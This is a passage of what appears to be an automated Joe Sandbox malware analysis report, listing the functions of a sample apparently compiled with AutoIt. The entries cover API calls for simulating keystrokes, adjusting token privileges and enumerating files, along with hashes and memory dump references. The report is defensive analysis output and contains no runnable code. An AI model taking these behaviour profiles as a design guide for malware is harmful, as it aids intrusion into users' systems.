                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: 84f1f9a8fca542764d901a680d046f9c6a48cedfa273fc4004288c7a278525f5
                                                                                                                      • Instruction ID: 5c99d2514b7fba22099efd3b5143b2858b67eff40d89ba764a1a0a2a3ee13b19
                                                                                                                      • Opcode Fuzzy Hash: 84f1f9a8fca542764d901a680d046f9c6a48cedfa273fc4004288c7a278525f5
                                                                                                                      • Instruction Fuzzy Hash: F6211FB85083419FCB54DF24C444F1ABBE1BF88319F05886DE89A57762C735E819CB9A
                                                                                                                      Function 004E4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __lock_file.LIBCMT ref: 004E48A6
                                                                                                                        • Part of subcall function 004E8B28: __getptd_noexit.LIBCMT ref: 004E8B28
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __getptd_noexit__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2597487223-0
                                                                                                                      • Opcode ID: 4a6e38217d5fb6567ea459d247b17865837b1b9b0ebea7c85b5a9cf800e8ba1f
                                                                                                                      • Instruction ID: b5334547b65f7c178b1fafaaf0f33f848455137db89e8fd5b5bfc611bd939283
                                                                                                                      • Opcode Fuzzy Hash: 4a6e38217d5fb6567ea459d247b17865837b1b9b0ebea7c85b5a9cf800e8ba1f
                                                                                                                      • Instruction Fuzzy Hash: A7F0F431800684ABDF11BFA38C0579E37A0BF4032BF11840EF418961C1CB7C8951DB59
                                                                                                                      Function 004C4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?,?,005852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 004C4E7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      • Opcode ID: 9660812e55ce1ea1c2dafc6ab3710c91c700e5bd4bff49e30c3ebd0ad3c5c08b
                                                                                                                      • Instruction ID: 0568252730f350ea6a7181b6c9dcf285edc4536ac95db67a68bf07da3f15c86b
                                                                                                                      • Opcode Fuzzy Hash: 9660812e55ce1ea1c2dafc6ab3710c91c700e5bd4bff49e30c3ebd0ad3c5c08b
                                                                                                                      • Instruction Fuzzy Hash: 22F08578100711CFCBB49F24E5A0D53BBE0BFA03293218A3FE1DA82620C33A9840DF04
                                                                                                                      Function 004E0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004E07B0
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongNamePath_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2514874351-0
                                                                                                                      • Opcode ID: 2d85c5206d55b872e61dc284923f4c5ef9d3c6e8c3da67d9398e742f7f1f2835
                                                                                                                      • Instruction ID: f86f86c88ba2e10cb7c6927d90fd6e61b88654b3bbe0fb646692df8e61cc2ee1
                                                                                                                      • Opcode Fuzzy Hash: 2d85c5206d55b872e61dc284923f4c5ef9d3c6e8c3da67d9398e742f7f1f2835
                                                                                                                      • Instruction Fuzzy Hash: DDE07D3A9041285BC720D25D9C05FFA77DCDF883A4F0441BAFD0CC3204D9A4AC8086D0
                                                                                                                      Function 004E525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wfsopen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 197181222-0
                                                                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                      • Instruction ID: 2a107f888c67ae7f9849e7259054cf2552eb18bd99a3a64e1f53489df2e11c98
                                                                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                      • Instruction Fuzzy Hash: 44B0927644020C77CE012A83EC02A493B199B41768F408061FB0C1C162A677A6649A89
                                                                                                                      Function 01108110 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 01108121
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2176622884.0000000001105000.00000040.00000020.00020000.00000000.sdmp, Offset: 01105000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1105000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction ID: b2158dc8f1ec538b36dbe3c73b4d1f7089785b50a0b093263aa20e600381f44b
                                                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction Fuzzy Hash: F8E0E67494410DDFDB00EFB4D54969E7FB4EF04301F104161FD01E2281D7709D508A62

                                                                                                                      Non-executed Functions

                                                                                                                      Function 0054CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0054CB37
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0054CB95
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0054CBD6
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0054CC00
                                                                                                                      • SendMessageW.USER32 ref: 0054CC29
                                                                                                                      • _wcsncpy.LIBCMT ref: 0054CC95
                                                                                                                      • GetKeyState.USER32(00000011), ref: 0054CCB6
                                                                                                                      • GetKeyState.USER32(00000009), ref: 0054CCC3
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0054CCD9
                                                                                                                      • GetKeyState.USER32(00000010), ref: 0054CCE3
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0054CD0C
                                                                                                                      • SendMessageW.USER32 ref: 0054CD33
                                                                                                                      • SendMessageW.USER32(?,00001030,?,0054B348), ref: 0054CE37
                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0054CE4D
                                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0054CE60
                                                                                                                      • SetCapture.USER32(?), ref: 0054CE69
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0054CECE
                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0054CEDB
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0054CEF5
                                                                                                                      • ReleaseCapture.USER32 ref: 0054CF00
                                                                                                                      • GetCursorPos.USER32(?), ref: 0054CF3A
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0054CF47
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0054CFA3
                                                                                                                      • SendMessageW.USER32 ref: 0054CFD1
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0054D00E
                                                                                                                      • SendMessageW.USER32 ref: 0054D03D
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0054D05E
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0054D06D
                                                                                                                      • GetCursorPos.USER32(?), ref: 0054D08D
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0054D09A
                                                                                                                      • GetParent.USER32(?), ref: 0054D0BA
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0054D123
                                                                                                                      • SendMessageW.USER32 ref: 0054D154
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0054D1B2
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0054D1E2
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0054D20C
                                                                                                                      • SendMessageW.USER32 ref: 0054D22F
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0054D281
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0054D2B5
                                                                                                                        • Part of subcall function 004C25DB: GetWindowLongW.USER32(?,000000EB), ref: 004C25EC
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0054D351
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                      • String ID: @GUI_DRAGID$F$pbX
                                                                                                                      • API String ID: 3977979337-1742414351
                                                                                                                      • Opcode ID: afd2ee99c4431973a10a8578fd700ec7398f60182ff27df7c9dfb58713add25e
                                                                                                                      • Instruction ID: 137c87a34f5f16654e1217ca8573f82fc65f148fd4fe1863178ed61b9b31244e
                                                                                                                      • Opcode Fuzzy Hash: afd2ee99c4431973a10a8578fd700ec7398f60182ff27df7c9dfb58713add25e
                                                                                                                      • Instruction Fuzzy Hash: DE42BB38205241AFDB24CF28C888EEABFE5FF89318F54091DF956972A1D771D844EB52
                                                                                                                      Function 004D6F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$_memset
                                                                                                                      • String ID: ]W$3cM$DEFINE$P\W$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_M
                                                                                                                      • API String ID: 1357608183-1390859148
                                                                                                                      • Opcode ID: 6cda312ddded430c5fff906eaec3ad95d6f125ac6983b5eecb33bfca544b6326
                                                                                                                      • Instruction ID: 0172b4cd0d1180d243c7cf294b71e9824f0e9297416d2eb1978ff2ee05348a3c
                                                                                                                      • Opcode Fuzzy Hash: 6cda312ddded430c5fff906eaec3ad95d6f125ac6983b5eecb33bfca544b6326
                                                                                                                      • Instruction Fuzzy Hash: 6B93B275A04215DBEB24CF98C891BEDBBB1FF48310F24856AE945AB381E7749DC2CB44
                                                                                                                      Function 004C48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(00000000,?), ref: 004C48DF
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004FD665
                                                                                                                      • IsIconic.USER32(?), ref: 004FD66E
                                                                                                                      • ShowWindow.USER32(?,00000009), ref: 004FD67B
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004FD685
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004FD69B
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004FD6A2
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 004FD6AE
                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 004FD6BF
                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 004FD6C7
                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004FD6CF
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004FD6D2
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004FD6E7
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 004FD6F2
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004FD6FC
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 004FD701
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004FD70A
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 004FD70F
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004FD719
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 004FD71E
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004FD721
                                                                                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 004FD748
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                      • Opcode ID: 10fa70f2324ec6cb33e314d0162ca18eccf8c1bd1935c2ead27037dee924478e
                                                                                                                      • Instruction ID: b8a8c7bf0dd81f97de0b095babbd53e1eb65a843e06be540cae953e92feb22f7
                                                                                                                      • Opcode Fuzzy Hash: 10fa70f2324ec6cb33e314d0162ca18eccf8c1bd1935c2ead27037dee924478e
                                                                                                                      • Instruction Fuzzy Hash: EF31B275A4031CBAEB202BA59C49FBF3E6DEB55B50F104026FA04EA1D0CAB45801BBA5
                                                                                                                      Function 00518310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 005187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0051882B
                                                                                                                        • Part of subcall function 005187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00518858
                                                                                                                        • Part of subcall function 005187E1: GetLastError.KERNEL32 ref: 00518865
                                                                                                                      • _memset.LIBCMT ref: 00518353
                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 005183A5
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 005183B6
                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005183CD
                                                                                                                      • GetProcessWindowStation.USER32 ref: 005183E6
                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 005183F0
                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0051840A
                                                                                                                        • Part of subcall function 005181CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00518309), ref: 005181E0
                                                                                                                        • Part of subcall function 005181CB: CloseHandle.KERNEL32(?,?,00518309), ref: 005181F2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                      • String ID: $default$winsta0
                                                                                                                      • API String ID: 2063423040-1027155976
                                                                                                                      • Opcode ID: 5c4589b519d40fccfa7fa6b88ce4f5e155796460632c4d2db594640a1b642ea2
                                                                                                                      • Instruction ID: 29d9df4a0c5475910dad18b179622f3049d0aed61be18886a6434ed7830ddd9b
                                                                                                                      • Opcode Fuzzy Hash: 5c4589b519d40fccfa7fa6b88ce4f5e155796460632c4d2db594640a1b642ea2
                                                                                                                      • Instruction Fuzzy Hash: 02814B71800209BEEF219FA4DC45AFE7F79FF05308F144169F914A6261EB358E94DB20
                                                                                                                      Function 0052C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0052C78D
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052C7E1
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0052C806
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0052C81D
                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0052C844
                                                                                                                      • __swprintf.LIBCMT ref: 0052C890
                                                                                                                      • __swprintf.LIBCMT ref: 0052C8D3
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                      • __swprintf.LIBCMT ref: 0052C927
                                                                                                                        • Part of subcall function 004E3698: __woutput_l.LIBCMT ref: 004E36F1
                                                                                                                      • __swprintf.LIBCMT ref: 0052C975
                                                                                                                        • Part of subcall function 004E3698: __flsbuf.LIBCMT ref: 004E3713
                                                                                                                        • Part of subcall function 004E3698: __flsbuf.LIBCMT ref: 004E372B
                                                                                                                      • __swprintf.LIBCMT ref: 0052C9C4
                                                                                                                      • __swprintf.LIBCMT ref: 0052CA13
                                                                                                                      • __swprintf.LIBCMT ref: 0052CA62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                      • API String ID: 3953360268-2428617273
                                                                                                                      • Opcode ID: b5055c5877ac9d93b5f60fe2253cc4265567e99373fd9fbf042be2e5b427963d
                                                                                                                      • Instruction ID: 39d0d84b89fe03e00c4bbf5762b36b359a4d1dead9b5f82df2966641ccb9fb0b
                                                                                                                      • Opcode Fuzzy Hash: b5055c5877ac9d93b5f60fe2253cc4265567e99373fd9fbf042be2e5b427963d
                                                                                                                      • Instruction Fuzzy Hash: 70A13FB5408344ABC750EFA5C885EAFB7ECFF95708F40091EF58587191EA34DA08CB66
                                                                                                                      Function 0052EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0052EFB6
                                                                                                                      • _wcscmp.LIBCMT ref: 0052EFCB
                                                                                                                      • _wcscmp.LIBCMT ref: 0052EFE2
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0052EFF4
                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0052F00E
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0052F026
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052F031
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0052F04D
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F074
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F08B
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0052F09D
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00578920), ref: 0052F0BB
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0052F0C5
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052F0D2
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052F0E4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1803514871-438819550
                                                                                                                      • Opcode ID: 54ac61d0b9803bc5aca8d6fe52515904bf4ed21b3d779fc3b9f0e1b7e4f384e4
                                                                                                                      • Instruction ID: d79a31b3b0906b0326f312293cd3dcb5a2acd30382d171125a591c5c198dac5f
